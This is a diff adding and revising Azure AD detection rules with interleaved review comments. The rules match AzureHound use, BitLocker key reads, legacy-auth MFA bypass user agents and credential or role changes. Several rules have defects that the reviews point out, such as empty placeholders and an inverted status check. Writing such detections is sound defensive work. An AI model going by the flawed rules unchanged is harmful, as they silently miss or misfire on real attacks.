diff --git a/src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml b/src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml
new file mode 100644
index 000000000..097458432
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml
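Review bot: `filter: Location|contains: ''` in azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml is a placeholder with an empty substring, and `selection and not filter` then depends on how the backend renders contains-empty: if it becomes a match-all wildcard the rule never fires, if it is rejected the rule fails to load. Either way an operator has no cue to fill anything in without reading the YAML. Put the expected-country list behind a clearly labelled placeholder and say in `description` that it must be set before enabling; the same empty `|contains: ''` is in azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml (`Location`) and azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml (`InitiatedBy`) later in this commit.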
@@ -0,0 +1,23 @@
+title: Discovery Using AzureHound
+id: 35b781cc-1a08-4a5a-80af-42fd7c315c6b
+status: test
+description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
+references:
+ - https://github.com/BloodHoundAD/AzureHound
+author: Janantha Marasinghe
+date: 2022/11/27
+tags:
+ - attack.discovery
+ - attack.t1087.004
+ - attack.t1526
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ userAgent|contains: 'azurehound'
+ ResultType: 0
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml b/src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml
new file mode 100644
index 000000000..79aa10833
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml
@@ -0,0 +1,22 @@
+title: Bitlocker Key Retrieval
+id: a0413867-daf3-43dd-9245-734b3a787942
+status: test
+description: Monitor and alert for Bitlocker key retrieval.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval
+author: Michael Epping, '@mepples21'
+date: 2022/06/28
+tags:
+ - attack.defense_evasion
+ - attack.t1078.004
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ Category: KeyManagement
+ OperationName: Read BitLocker key
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml b/src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml
new file mode 100644
index 000000000..51f92e935
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml
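Review bot: azure_ad_bitlocker_key_retrieval.yml lists `falsepositives: - Unknown`, but reading a BitLocker recovery key is a routine help-desk action and every such read will alert at level medium. The falsepositives should name that case, e.g. `- Help desk or device owner retrieving a recovery key for a legitimate unlock or repair`, so analysts know to check the initiating identity and the target device rather than treating every hit as an incident.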
@@ -0,0 +1,24 @@
+title: Device Registration or Join Without MFA
+id: 5afa454e-030c-4ab4-9253-a90aa7fcc581
+status: test
+description: Monitor and alert for device registration or join events where MFA was not performed.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy
+author: Michael Epping, '@mepples21'
+date: 2022/06/28
+tags:
+ - attack.defense_evasion
+ - attack.t1078.004
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ ResourceDisplayName: 'Device Registration Service'
+ conditionalAccessStatus: 'success'
+ filter_mfa:
+ AuthenticationRequirement: 'multiFactorAuthentication'
+ condition: selection and not filter_mfa
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml b/src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml
new file mode 100644
index 000000000..dac899544
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml
@@ -0,0 +1,23 @@
+title: Changes to Device Registration Policy
+id: 9494bff8-959f-4440-bbce-fb87a208d517
+status: test
+description: Monitor and alert for changes to the device registration policy.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy
+author: Michael Epping, '@mepples21'
+date: 2022/06/28
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1484
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ Category: 'Policy'
+ ActivityDisplayName: 'Set device registration policies'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml b/src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml
new file mode 100644
index 000000000..8dc43efa0
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml
@@ -0,0 +1,25 @@
+title: Failed Authentications From Countries You Do Not Operate Out Of
+id: 28870ae4-6a13-4616-bd1a-235a7fad7458
+status: test
+description: Detect failed authentications from countries you do not operate out of.
+references:
+ - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts
+author: MikeDuddington, '@dudders1'
+date: 2022/07/28
+tags:
+ - attack.initial_access
+ - attack.credential_access
+ - attack.t1078.004
+ - attack.t1110
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: 'Success'
+ selection1:
+ Location|contains: ''
+ condition: not selection and not selection1
+falsepositives:
+ - If this was approved by System Administrator.
+level: low
diff --git a/src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml b/src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml
new file mode 100644
index 000000000..e85511411
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml
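Review bot: `condition: not selection and not selection1` in azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml negates `Status: 'Success'`, which matches every sign-in that is not a success — interrupted and pending sign-ins as well as failures — and also events where `Status` is absent. The sibling azure_ad_auth_failure_increase.yml in this commit matches failures positively with `Status: failure`; the same positive selection here (`selection: Status: failure` with `condition: selection and not selection1`) would make the rule do what its title says.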
@@ -0,0 +1,24 @@
+title: Guest Users Invited To Tenant By Non Approved Inviters
+id: 4ad97bf5-a514-41a4-abd3-4f3455ad4865
+status: test
+description: Detects guest users being invited to tenant by non-approved inviters
+references:
+ - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins
+author: MikeDuddington, '@dudders1'
+date: 2022/07/28
+tags:
+ - attack.initial_access
+ - attack.t1078
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ Category: 'UserManagement'
+ OperationName: 'Invite external user'
+ filter:
+ InitiatedBy|contains: ''
+ condition: selection and not filter
+falsepositives:
+ - If this was approved by System Administrator.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml b/src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml
new file mode 100644
index 000000000..a9673c1ec
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml
@@ -0,0 +1,24 @@
+title: Azure AD Only Single Factor Authentication Required
+id: 28eea407-28d7-4e42-b0be-575d5ba60b2c
+status: test
+description: Detect when users are authenticating without MFA being required.
+references:
+ - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts
+author: MikeDuddington, '@dudders1'
+date: 2022/07/27
+tags:
+ - attack.initial_access
+ - attack.credential_access
+ - attack.t1078.004
+ - attack.t1556.006
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: 'Success'
+ AuthenticationRequirement: 'singleFactorAuthentication'
+ condition: selection
+falsepositives:
+ - If this was approved by System Administrator.
+level: low
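Review bot: The single-factor rule keys a successful sign-in on `Status: 'Success'`, whereas azure_ad_sign_ins_from_unknown_devices.yml, added in the same commit, expresses the same condition as `ResultType: 0`; in the Log Analytics SigninLogs export `Status` is, as far as I know, a nested object (errorCode/failureReason) and `ResultType` the flat code, so one of the two spellings is unlikely to match in any given pipeline. `Status: 'Success'` is repeated in the risky-sign-in and MFA-bypass rules, so the new Azure rules should settle on one convention and document it once, e.g. `# success sign-in = ResultType 0 in the Log Analytics export; Status is nested there`. The description could also say whether this rule is meant for alerting or for baselining, since it matches every single-factor success in the tenant.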
diff --git a/src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml b/src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
new file mode 100644
index 000000000..dee8102de
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
@@ -0,0 +1,24 @@
+title: Suspicious SignIns From A Non Registered Device
+id: 572b12d4-9062-11ed-a1eb-0242ac120002
+status: test
+description: Detects risky authencaition from a non AD registered device without MFA being required.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in
+author: Harjot Singh, '@cyb3rjy0t'
+date: 2023/01/10
+tags:
+ - attack.defense_evasion
+ - attack.t1078
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: 'Success'
+ AuthenticationRequirement: 'singleFactorAuthentication'
+ DeviceDetail.trusttype: ''
+ RiskState: 'atRisk'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml b/src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml
new file mode 100644
index 000000000..a140f82c6
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml
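Review bot: The description carries a typo, `authencaition`; it should read `description: Detects risky authentication from a non AD registered device without MFA being required.` Separately, `DeviceDetail.trusttype: ''` relies on the backend rendering an empty value as "field empty or absent"; some Sigma backends emit a literal equality with `""` that never matches a missing field, so confirm how the target backend renders it and say so on the line, e.g. `# '' means 'no trust type recorded' — verify backend rendering`. The same empty-value idiom is used for `DeviceDetail.deviceId: ''` in azure_ad_sign_ins_from_unknown_devices.yml.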
@@ -0,0 +1,21 @@
+title: Sign-ins from Non-Compliant Devices
+id: 4f77e1d7-3982-4ee0-8489-abf2d6b75284
+status: test
+description: Monitor and alert for sign-ins where the device was non-compliant.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in
+author: Michael Epping, '@mepples21'
+date: 2022/06/28
+tags:
+ - attack.defense_evasion
+ - attack.t1078.004
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ DeviceDetail.isCompliant: 'false'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml b/src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml
new file mode 100644
index 000000000..ea0ad71d9
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml
@@ -0,0 +1,25 @@
+title: Sign-ins by Unknown Devices
+id: 4d136857-6a1a-432a-82fc-5dd497ee5e7c
+status: test
+description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in
+author: Michael Epping, '@mepples21'
+date: 2022/06/28
+modified: 2022/10/05
+tags:
+ - attack.defense_evasion
+ - attack.t1078.004
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ AuthenticationRequirement: singleFactorAuthentication
+ ResultType: 0
+ NetworkLocationDetails: '[]'
+ DeviceDetail.deviceId: ''
+ condition: selection
+falsepositives:
+ - Unknown
+level: low
diff --git a/src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml b/src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml
new file mode 100644
index 000000000..f5bdb20e1
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml
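Review bot: `DeviceDetail.isCompliant: 'false'` compares what is a boolean in the sign-in log against the string `'false'`; in a pipeline that keeps the field typed this never matches, and the same quoted boolean appears as `ConsentContext.IsAdminConsent: 'false'` in azure_app_end_user_consent.yml. In the unknown-devices rule below it, `NetworkLocationDetails: '[]'` likewise only matches if the backend serialises an empty array as the literal text `[]`. Either use the unquoted YAML boolean (`DeviceDetail.isCompliant: false`) or record the assumption on the line, e.g. `# stored as a string in this pipeline; use unquoted false for typed fields`, so the next reader knows which pipeline the rule was validated against.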
@@ -0,0 +1,28 @@
+title: Potential MFA Bypass Using Legacy Client Authentication
+id: 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc
+status: test
+description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
+references:
+ - https://blooteem.com/march-2022
+ - https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/
+author: Harjot Singh, '@cyb3rjy0t'
+date: 2023/03/20
+tags:
+ - attack.initial_access
+ - attack.credential_access
+ - attack.t1078.004
+ - attack.t1110
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: 'Success'
+ userAgent|contains:
+ - 'BAV2ROPC'
+ - 'CBAinPROD'
+ - 'CBAinTAR'
+ condition: selection
+falsepositives:
+ - Known Legacy Accounts
+level: high
diff --git a/src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml b/src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml
new file mode 100644
index 000000000..cb4928305
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml
@@ -0,0 +1,28 @@
+title: User Added to an Administrator's Azure AD Role
+id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7
+status: test
+description: User Added to an Administrator's Azure AD Role
+references:
+ - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/
+author: Raphaël CALVET, @MetallicHack
+date: 2021/10/04
+modified: 2022/10/09
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.t1098.003
+ - attack.t1078
+logsource:
+ product: azure
+ service: activitylogs
+detection:
+ selection:
+ Operation: 'Add member to role.'
+ Workload: 'AzureActiveDirectory'
+ ModifiedProperties{}.NewValue|endswith:
+ - 'Admins'
+ - 'Administrator'
+ condition: selection
+falsepositives:
+ - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml b/src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml
new file mode 100644
index 000000000..b44ceb6b4
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml
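Review bot: The selection fields `Operation`, `Workload: 'AzureActiveDirectory'` and `ModifiedProperties{}.NewValue` look like the Office 365 Unified Audit Log schema, yet the logsource says `product: azure / service: activitylogs`, while the neighbouring azure_ad_users_added_to_device_admin_roles.yml keys the same event on `auditlogs` with `Category`/`OperationName`/`TargetResources`. If this rule is meant for the Azure AD audit log its fields should be aligned with that sibling; if it is meant for the M365 audit log the logsource should say so, or at least carry a comment such as `# fields follow the Office 365 Unified Audit Log export, not the Azure AD audit log`. The `endswith` pair `'Admins'` / `'Administrator'` would also miss role names ending in "Administrators", though the exact NewValue strings depend on the export and should be checked. The description merely repeats the title and could state the field schema and the PIM caveat instead.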
@@ -0,0 +1,28 @@
+title: Users Added to Global or Device Admin Roles
+id: 11c767ae-500b-423b-bae3-b234450736ed
+status: test
+description: Monitor and alert for users added to device admin roles.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles
+author: Michael Epping, '@mepples21'
+date: 2022/06/28
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1078.004
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ Category: RoleManagement
+ OperationName|contains|all:
+ - 'Add'
+ - 'member to role'
+ TargetResources|contains:
+ - '7698a772-787b-4ac8-901f-60d6b08affd2'
+ - '62e90394-69f5-4237-9190-012177145e10'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml b/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml
index 3b4020f58..fd9df909a 100644
--- a/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml
+++ b/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml
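Review bot: The two GUIDs under `TargetResources|contains` are bare magic values; a reader cannot tell which roles they denote, nor why the title says "Global or Device Admin Roles" while the description mentions only device admin roles. They appear to be directory role template IDs (the second one the Global Administrator template), so comment each value, e.g. `- '7698a772-787b-4ac8-901f-60d6b08affd2' # Cloud Device Administrator role template` and `- '62e90394-69f5-4237-9190-012177145e10' # Global Administrator role template`, after confirming them against the tenant's role template list, and widen the description to `Monitor and alert for users added to the Global Administrator or device admin roles.`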
@@ -1,24 +1,26 @@
 title: Application AppID Uri Configuration Changes
 id: 1b45b0d1-773f-4f23-aedc-814b759563b1
+status: test
 description: Detects when a configuration change is made to an applications AppID URI.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed
 author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
 date: 2022/06/02
-references:
- - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed
+tags:
+ - attack.persistence
+ - attack.credential_access
+ - attack.privilege_escalation
+ - attack.t1552
+ - attack.t1078.004
 logsource:
- product: azure
- service: auditlogs
+ product: azure
+ service: auditlogs
 detection:
- selection:
- properties.message:
- - Update Application
- - Update Service principal
- condition: selection
+ selection:
+ properties.message:
+ - Update Application
+ - Update Service principal
+ condition: selection
 falsepositives:
- - When and administrator is making legitmate AppID URI configuration changes to an application. This should be a planned event.
+ - When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.
 level: high
-status: experimental
-tags:
- - attack.t1528
- - attack.persistence
- - attack.credential_access
diff --git a/src/main/resources/rules/azure/azure_app_credential_added.yml b/src/main/resources/rules/azure/azure_app_credential_added.yml
index 21f08f9e1..e2d3803a9 100644
--- a/src/main/resources/rules/azure/azure_app_credential_added.yml
+++ b/src/main/resources/rules/azure/azure_app_credential_added.yml
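Review bot: The rewritten false-positive line fixes `legitmate` but keeps the grammatical slip in front of it, `When and administrator`; it should read `- When an administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.` The identical slip survives in azure_app_uri_modifications.yml further down. Separately, the selection matches every `Update Application` / `Update Service principal` audit event, not only AppID URI changes, so the title promises more precision than the detection delivers; if the modified-property name is available in this pipeline it belongs in the selection, otherwise the description should state that the rule fires on all application updates.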
@@ -1,23 +1,23 @@
 title: Added Credentials to Existing Application
 id: cbb67ecc-fb70-4467-9350-c910bdf7c628
-description: Detects when a new credential is added to an existing applcation. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
+status: test
+description: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials
 author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
 date: 2022/05/26
-references:
- - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials
+tags:
+ - attack.t1098.001
+ - attack.persistence
 logsource:
- product: azure
- service: auditlogs
+ product: azure
+ service: auditlogs
 detection:
- selection:
- properties.message:
- - Update Application-Certificates and secrets management
- - Update Service principal/Update Application
- condition: selection
+ selection:
+ properties.message:
+ - Update Application-Certificates and secrets management
+ - Update Service principal/Update Application
+ condition: selection
 falsepositives:
- - When credentials are added/removed as part of the normal working hours/workflows
+ - When credentials are added/removed as part of the normal working hours/workflows
 level: high
-status: experimental
-tags:
- - attack.t1098
- - attack.persistence
diff --git a/src/main/resources/rules/azure/azure_app_credential_modification.yml b/src/main/resources/rules/azure/azure_app_credential_modification.yml
index 5f226d2fc..4bc842cff 100644
--- a/src/main/resources/rules/azure/azure_app_credential_modification.yml
+++ b/src/main/resources/rules/azure/azure_app_credential_modification.yml
@@ -1,22 +1,23 @@
 title: Azure Application Credential Modified
 id: cdeef967-f9a1-4375-90ee-6978c5f23974
+status: test
 description: Identifies when a application credential is modified.
-author: Austin Songer @austinsonger
-status: experimental
-date: 2021/09/02
 references:
 - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/
+author: Austin Songer @austinsonger
+date: 2021/09/02
+modified: 2022/10/09
+tags:
+ - attack.impact
 logsource:
- product: azure
- service: activitylogs
+ product: azure
+ service: activitylogs
 detection:
 selection:
 properties.message: 'Update application - Certificates and secrets management'
 condition: selection
-level: medium
-tags:
- - attack.impact
 falsepositives:
- - Application credential added may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+ - Application credential added may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml b/src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml
new file mode 100644
index 000000000..6b522d977
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml
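Review bot: This rule and azure_app_credential_added.yml in the previous hunk detect the same credential-management audit event but disagree on the logsource service (`activitylogs` here, `auditlogs` there) and on the literal (`'Update application - Certificates and secrets management'` here versus `Update Application-Certificates and secrets management` there), so at most one spelling can match the real log text for a given source. Settle on one service and one literal for both rules and record where it was taken from, e.g. `# literal copied from the Azure AD audit log 'Update application' activity — verify spacing and case on ingest`; the `description` could also cross-reference the sibling rule so the overlap is deliberate rather than accidental.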
@@ -0,0 +1,21 @@
+title: Delegated Permissions Granted For All Users
+id: a6355fbe-f36f-45d8-8efc-ab42465cbc52
+status: test
+description: Detects when highly privileged delegated permissions are granted on behalf of all users
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions
+author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
+date: 2022/07/28
+tags:
+ - attack.credential_access
+ - attack.t1528
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message: Add delegated permission grant
+ condition: selection
+falsepositives:
+ - When the permission is legitimately needed for the app
+level: high
diff --git a/src/main/resources/rules/azure/azure_app_device_code_authentication.yml b/src/main/resources/rules/azure/azure_app_device_code_authentication.yml
index 5301f8db6..8e02b76f0 100644
--- a/src/main/resources/rules/azure/azure_app_device_code_authentication.yml
+++ b/src/main/resources/rules/azure/azure_app_device_code_authentication.yml
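Review bot: The selection is only `properties.message: Add delegated permission grant`, with nothing restricting it to "highly privileged" permissions or to grants "on behalf of all users" as the title and description claim, so it fires on every delegated permission grant in the tenant. It is also a strict subset of azure_app_permissions_msft.yml, which matches the same message plus `Add app role assignment to service principal`, and that second message is all that azure_app_privileged_permissions.yml matches, so the three new rules overlap completely, all at `level: high`. If the consent type (the `ConsentContext.IsAdminConsent` field used in azure_app_end_user_consent.yml) or the resource/permission names are available in this pipeline, add them to narrow each rule to what its title says; otherwise rewrite the descriptions to state what is actually matched.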
@@ -1,27 +1,27 @@
 title: Application Using Device Code Authentication Flow
 id: 248649b7-d64f-46f0-9fb2-a52774166fb5
-status: experimental
+status: test
 description: |
- Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.
- If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.
- This can be a misconfigured application or potentially something malicious.
+ Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.
+ If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.
+ This can be a misconfigured application or potentially something malicious.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows
 author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
 date: 2022/06/01
-references:
- - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows
+tags:
+ - attack.t1078
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.initial_access
 logsource:
- product: azure
- service: signinlogs
+ product: azure
+ service: signinlogs
 detection:
- selection:
- properties.message: Device Code
- condition: selection
+ selection:
+ properties.message: Device Code
+ condition: selection
 falsepositives:
- - Applications that are input constrained will need to use device code flow and are valid authentications.
+ - Applications that are input constrained will need to use device code flow and are valid authentications.
 level: medium
-tags:
- - attack.t1078
- - attack.defense_evasion
- - attack.persistence
- - attack.privilege_escalation
- - attack.initial_access
diff --git a/src/main/resources/rules/azure/azure_app_end_user_consent.yml b/src/main/resources/rules/azure/azure_app_end_user_consent.yml
new file mode 100644
index 000000000..0311a2453
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_app_end_user_consent.yml
@@ -0,0 +1,21 @@
+title: End User Consent
+id: 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a
+status: test
+description: Detects when an end user consents to an application
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent
+author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
+date: 2022/07/28
+tags:
+ - attack.credential_access
+ - attack.t1528
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ ConsentContext.IsAdminConsent: 'false'
+ condition: selection
+falsepositives:
+ - Unknown
+level: low
diff --git a/src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml b/src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml
new file mode 100644
index 000000000..37439a1a7
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml
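Review bot: `properties.message: Device Code` in the device-code hunk is a free-text match on the whole message field rather than on the sign-in protocol, so it also fires on any sign-in whose message happens to contain those words and misses device-code flows whose message is worded differently; the same applies to `properties.message: ROPC` in azure_app_ropc_authentication.yml. As far as I recall the Log Analytics SigninLogs export carries the protocol in a dedicated `AuthenticationProtocol` column (values such as `deviceCode` and `ropc`), which would be the robust key if this pipeline ingests it — worth confirming and noting on the line, e.g. `# free-text match; prefer AuthenticationProtocol where the export provides it`. The device-code hunk begins on the previous source line.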
@@ -0,0 +1,21 @@
+title: End User Consent Blocked
+id: 7091372f-623c-4293-bc37-20c32b3492be
+status: test
+description: Detects when end user consent is blocked due to risk-based consent.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent
+author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
+date: 2022/07/10
+tags:
+ - attack.credential_access
+ - attack.t1528
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ failure_status_reason: 'Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/azure/azure_app_owner_added.yml b/src/main/resources/rules/azure/azure_app_owner_added.yml
index 54b3b92f6..3b29d899f 100644
--- a/src/main/resources/rules/azure/azure_app_owner_added.yml
+++ b/src/main/resources/rules/azure/azure_app_owner_added.yml
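Review bot: `failure_status_reason` is the only snake_case field name among the new Azure rules; the audit-log export the sibling rules target uses PascalCase names (`Category`, `OperationName`, `TargetResources`), so this looks like a field from a different pipeline and may never resolve. Confirm the column that carries the failure text in the ingested export (in Log Analytics AuditLogs it is, as far as I recall, `ResultReason`) and record the choice on the line, e.g. `# field name per the <pipeline> export — verify against AuditLogs schema`.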
@@ -1,23 +1,21 @@
 title: Added Owner To Application
 id: 74298991-9fc4-460e-a92e-511aa60baec1
+status: test
 description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner
 author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
 date: 2022/06/02
-references:
- - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner
+tags:
+ - attack.t1552
+ - attack.credential_access
 logsource:
- product: azure
- service: auditlogs
+ product: azure
+ service: auditlogs
 detection:
- selection:
- properties.message: Add owner to application
- condition: selection
+ selection:
+ properties.message: Add owner to application
+ condition: selection
 falsepositives:
- - When a new application owner is added by an administrator
+ - When a new application owner is added by an administrator
 level: medium
-status: experimental
-tags:
- - attack.t1528
- - attack.persistence
- - attack.credential_access
- - attack.defense_evasion
diff --git a/src/main/resources/rules/azure/azure_app_permissions_msft.yml b/src/main/resources/rules/azure/azure_app_permissions_msft.yml
new file mode 100644
index 000000000..31f70985f
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_app_permissions_msft.yml
@@ -0,0 +1,23 @@
+title: App Granted Microsoft Permissions
+id: c1d147ae-a951-48e5-8b41-dcd0170c7213
+status: test
+description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
+references:
